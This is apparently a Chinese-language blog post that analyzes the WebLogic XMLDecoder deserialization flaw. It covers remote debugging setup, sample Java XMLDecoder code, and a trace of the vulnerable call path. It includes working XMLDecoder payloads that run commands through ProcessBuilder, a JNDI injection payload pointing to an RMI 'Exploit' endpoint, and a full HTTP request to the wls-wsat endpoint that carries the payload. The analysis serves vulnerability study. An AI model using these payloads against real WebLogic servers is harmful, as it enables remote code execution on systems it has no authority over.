1. 程式人生 > >weblogic遠端除錯XMLDecoder RCE

weblogic遠端除錯XMLDecoder RCE

首先說一下遠端除錯的配置,首先在weblogic的啟動檔案加入如下配置,開啟伺服器遠端除錯埠就是9999:
Alt text
第二步,建立一個java的空專案。
第三步將weblogic的所有jar包拷出來,放到一個檔案中。
Alt text
第四步把jar包匯入idea的lib配置中
Alt text
第五步新增一個remote,埠修改為9999
Alt text
在加入的jar包打斷點後,點選debug小瓢蟲的圖示就能進一步除錯了
Alt text
下面開始說xmldecoder的反序列化:
xmldecode,xmlendoer是將xml檔案轉化成java bean,簡單的小例子如下:
XMLTest.java

package me.lightless.shiro;

import java.beans.XMLEncoder;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.FileInputStream;
import java.io.FileOutputStream;
public class XMLTest {
        public void xmlEncode() throws Exception
         {
         MyInfo my = new MyInfo();
         my.setMyage(25);
         my.setMyName("google");
         my.setMyaddress("china");
         my.setMyEducation("master in science");

        XMLEncoder encoder = new XMLEncoder(
        new BufferedOutputStream(
        new FileOutputStream("myinfo.xml")));
         encoder.writeObject(my);
         encoder.close();
         System.out.println(my);
         }
         public void xmlDecode() throws Exception
         {
         java.beans.XMLDecoder decoder = new java.beans.XMLDecoder(
         new BufferedInputStream(new FileInputStream("myinfo.xml")));
         MyInfo my = (MyInfo)decoder.readObject();
         decoder.close();
         System.out.println(my);
         System.out.println("Your age: "+my.getMyage());
        }
         public static void main (String args[]) throws Exception {
         XMLTest st = new XMLTest();
         st.xmlEncode();
         st.xmlDecode();
         }
        }

MyInfo.java

package me.lightless.shiro;

public class MyInfo {
    private int myage;

    public int getMyage() {
        return myage;
    }

    public void setMyage(int myage) {
        this.myage = myage;
    }

    public String getMyName() {
        return myName;
    }

    public void setMyName(String myName) {
        this.myName = myName;
    }

    public String getMyaddress() {
        return myaddress;
    }

    public void setMyaddress(String myaddress) {
        this.myaddress = myaddress;
    }

    public String getMyEducation() {
        return myEducation;
    }

    public void setMyEducation(String myEducation) {
        this.myEducation = myEducation;
    }

    private String myName;
    private String myaddress;
    private String myEducation;
}

執行結果:
Alt text
如果xml傳入的是惡意程式碼,就能導致命令執行:
XmlDecoderTest.java

package me.lightless.shiro;

import java.beans.XMLDecoder;
import java.io.BufferedInputStream;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;

public class XmlDecoderTest {

    public static void main(String[] args) {
        // TODO Auto-generated method stub
        java.io.File file = new java.io.File("E:\\Struts2-Vulenv-master\\Java-Unserialization-Study\\src\\main\\java\\me\\lightless\\shiro\\xmldecoder.xml");
        java.beans.XMLDecoder xd = null;
        try {
            xd = new XMLDecoder(new BufferedInputStream(new FileInputStream(file)));
        } catch (FileNotFoundException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }

        Object s2 = xd.readObject();
        xd.close();
    }

}

如下三種payload能夠彈計算器:

<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_131" class="java.beans.XMLDecoder">
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="1">
            <void index="0">
                <string>calc</string>
            </void>
        </array>
        <void method="start" />
    </object>
</java>
<java version="1.4.0" class="java.beans.XMLDecoder">
    <new class="java.lang.ProcessBuilder">
        <string>calc</string><method name="start" />
    </new>
</java>

這個payload參考這個連線jndi注入https://paper.tuisec.win/detail/a5927ff39106516

<java version="1.8.0_131" class="java.beans.XMLDecoder">
    <void class="com.sun.rowset.JdbcRowSetImpl">
        <void property="dataSourceName">
            <string>rmi://localhost:1099/Exploit</string>
        </void>
        <void property="autoCommit">
            <boolean>true</boolean>
        </void>
    </void>
</java>

Alt text
提交如下payload:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 603

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.8.0_131" class="java.beans.XMLDecoder">
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="1">
            <void index="0">
                <string>calc</string>
            </void>
        </array>
        <void method="start" />
    </object>
</java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

C:\Users\Administrator\Desktop\lib\weblogic.jar!\weblogic\wsee\jaxws\workcontext\WorkContextServerTube.class在40行下斷點,傳入的引數。
Alt text
跟進readHeaderOld,跟進WorkContextXmlInputAdapter
Alt text
跟進行XMLDecoder,var1則是我們傳入的payload
Alt text
呼叫的棧資訊如下:
Alt text
參考連結:
https://paper.seebug.org/487/
https://blog.csdn.net/defonds/article/details/83510668#_39
https://github.com/Tom4t0/Tom4t0.github.io/blob/master/_posts/2017-12-22-WebLogic%20WLS-WebServices%E7%BB%84%E4%BB%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.md